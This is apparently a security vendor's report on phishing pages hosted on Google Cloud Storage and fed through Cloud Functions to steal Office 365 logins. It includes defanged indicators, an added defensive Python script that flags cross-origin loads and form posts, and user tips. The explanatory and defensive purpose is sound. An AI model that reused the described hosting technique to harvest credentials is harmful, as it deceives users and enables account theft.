Check Point researchers warn of, and cite an example of, a fast-growing trend in which hackers conceal phishing attacks on Google Cloud services, making it far more difficult for people to identify a phishing attack.
· Hackers upload a PDF document to Google Drive that includes a link to a phishing page
· The phishing page requests Office 365 credentials, then leads to a real PDF report published by a renowned global consulting firm
· The phishing page is hosted on Google Cloud Storage, but its malicious source code is traced to a Ukrainian IP address
Researchers at Check Point warn of a fast-growing trend in which hackers conceal phishing attacks on Google Cloud Platform (GCP). By using advanced features of a well-known cloud storage service, hackers can better disguise their malicious intentions and avoid the traditional red flags that people look for, such as suspicious-looking domains or websites without an HTTPS certificate. Below, Check Point researchers provide an example of a hacker using a GCP advanced feature, Google Cloud Functions, to orchestrate a sophisticated phishing attack, using the platform just as any legitimate business would.
Example: Hacker Uses GCP Advanced Features to Push a Phishing Attack
This year, Check Point researchers came across an attack that started with a PDF document uploaded to Google Drive, which included a link to a phishing page. The phishing page, hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html, asked the user to log in with their Office 365 or organization e-mail. When the user chose one of the options, a pop-up window with the Outlook login page appeared. After the credentials were entered, the user was led to a real PDF report published by a renowned global consulting firm. Throughout these stages, the user had no reason to become suspicious, since the phishing page was hosted on Google Cloud Storage.
However, viewing the phishing page's source code revealed that most of its resources were loaded from a website belonging to the attackers, prvtsmtp[.]com. The attackers had started using Google Cloud Functions, a serverless service for running code in the cloud. In this case, the phishing page's resources were loaded from a Google Cloud Functions instance, so the attackers' own malicious domains were never exposed in the page's address. Investigating prvtsmtp[.]com showed that it resolved to a Ukrainian IP address (31.28.168[.]4). Many other domains related to this phishing attack resolved to the same IP address, or to different addresses on the same netblock.
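As an added example (not Check Point's code, and not the real page) of the check a defender can run against this pattern: the script below parses a page served from a trusted storage host and flags every resource or form that points at another origin, such as a Cloud Functions endpoint or an attacker-controlled domain. The trusted-host set, the `.cloudfunctions.net` suffix match and the sample HTML are assumptions constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts users trust on sight; the report's phishing page lived on the first one.
TRUSTED_STORAGE_HOSTS = {"storage.googleapis.com"}
# Public hostname suffix of Google Cloud Functions HTTP endpoints.
CLOUD_FUNCTIONS_SUFFIX = ".cloudfunctions.net"

class ResourceCollector(HTMLParser):
    """Collect every host the page loads resources from or submits forms to."""
    ATTRS = {"script": "src", "link": "href", "img": "src", "iframe": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.hosts = []  # (tag, hostname); relative URLs are same-origin and skipped

    def handle_starttag(self, tag, attrs):
        wanted = self.ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value and urlparse(value).hostname:
                self.hosts.append((tag, urlparse(value).hostname.lower()))

def assess_page(page_url, html):
    """Return (suspicious, findings) for a page served from page_url."""
    page_host = urlparse(page_url).hostname.lower()
    collector = ResourceCollector()
    collector.feed(html)
    findings = []
    for tag, host in collector.hosts:
        if host == page_host:
            continue  # same bucket/host as the page itself
        if host.endswith(CLOUD_FUNCTIONS_SUFFIX):
            findings.append(f"{tag} loads from Cloud Functions endpoint {host}")
        else:
            findings.append(f"{tag} points at external host {host}")
    # A trusted storage host pulling code from, or posting credentials to, other
    # origins is exactly the pattern described in the report.
    return page_host in TRUSTED_STORAGE_HOSTS and bool(findings), findings

# Constructed sample mimicking the layout described above, not the real page;
# "attacker-controlled.example" stands in for the attackers' own domain.
SAMPLE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://storage.googleapis.com/example-bucket/style.css">
<script src="https://example-region-example-project.cloudfunctions.net/loader"></script>
</head><body><form action="https://attacker-controlled.example/login">
<input name="password"></form></body></html>"""

if __name__ == "__main__":
    print(assess_page(SAMPLE_URL, SAMPLE_HTML))
```

The same check can be run over pages fetched from a web proxy or sandbox, where a trusted host loading scripts from a function endpoint is worth an analyst's attention even when the certificate and domain look clean.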
Figure 1: Phishing page asking the user to log in with their Office 365 credentials
Figure 2: PDF report published by a renowned global consulting firm
Figure 3: Phishing page's malicious code
Quote: Lotem Finkelsteen, Check Point's Manager of Threat Intelligence:
"Hackers are swarming around the cloud storage services that we rely on and trust, making it much tougher to identify a phishing attack. Traditional red flags of a phishing attack, such as look-alike domains or websites without certificates, won't help us much as we enter a potential cyber pandemic. Users of Google Cloud Platform, even AWS and Azure users, should all beware of this fast-growing trend, and learn how to protect themselves. It starts by thinking twice about the files you receive from senders."
How To Stay Protected
1. Beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders.
2. Be cautious with files received via email from unknown senders, especially if they prompt for an action you would not usually take.
3. Ensure you are ordering goods from an authentic source. One way to do this is NOT to click on promotional links in emails, and instead Google your desired retailer and click the link from the Google results page.
4. Beware of "special" offers. "An exclusive cure for coronavirus for $150" is usually not a reliable or trustworthy purchase opportunity.
5. Make sure you do not reuse passwords between different applications and accounts.